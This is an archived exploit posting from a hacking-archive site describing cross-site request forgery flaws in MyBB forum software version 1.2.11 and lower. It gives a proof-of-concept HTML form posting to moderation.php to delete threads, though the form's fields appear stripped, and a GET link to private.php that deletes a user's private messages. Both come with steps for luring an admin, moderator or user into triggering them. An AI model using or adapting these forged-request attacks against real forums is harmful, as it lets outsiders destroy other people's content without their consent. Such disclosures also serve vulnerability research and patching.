AOH :: Web BBS :: Frequently Exploited

AOH :: Web BBS :: Frequently Exploited :: BX1530.HTM
MyBB 1.2.11 Multiple XSRF Vulnerabilities

MyBB 1.2.11 Multiple XSRF Vulnerabilities MyBB 1.2.11 Multiple XSRF Vulnerabilities


####################################################
Founded: 18, January 2008
Founder: nbbn
MyBB Version: 1.2.11 and lower
Type: Multiple XSRF Vulnerabilities
####################################################

####1) Delete Threads XSRF Vulnerabilitie:





action="http://localhost/xampp/mybb/moderation.php" method="post" 
name="formular">

 
 





 

###Poc: 
        1. Create a .html file and copy the code into it. 
        2. Upload the file and now send the link to an admin or moderator
        3. Done



####2) Delete PM's XSRF Vuln:

 This one is only doing via GET and no question: 
http://localhost/xampp/mybb/private.php?action=delete&pmid=3 


###Poc: (An easy way): 

 1. Send to a user this link: 
http://localhost/xampp/mybb/private.php?action=delete&pmid=3 
 2. Done

The entire AOH site is optimized to look best in Firefox® 3 on a widescreen monitor (1440x900 or better). Site design & layout copyright © 1986-2009 AOH
We do not send spam. If you have received spam bearing an artofhacking.com email address, please forward it with full headers to abuse@artofhacking.com.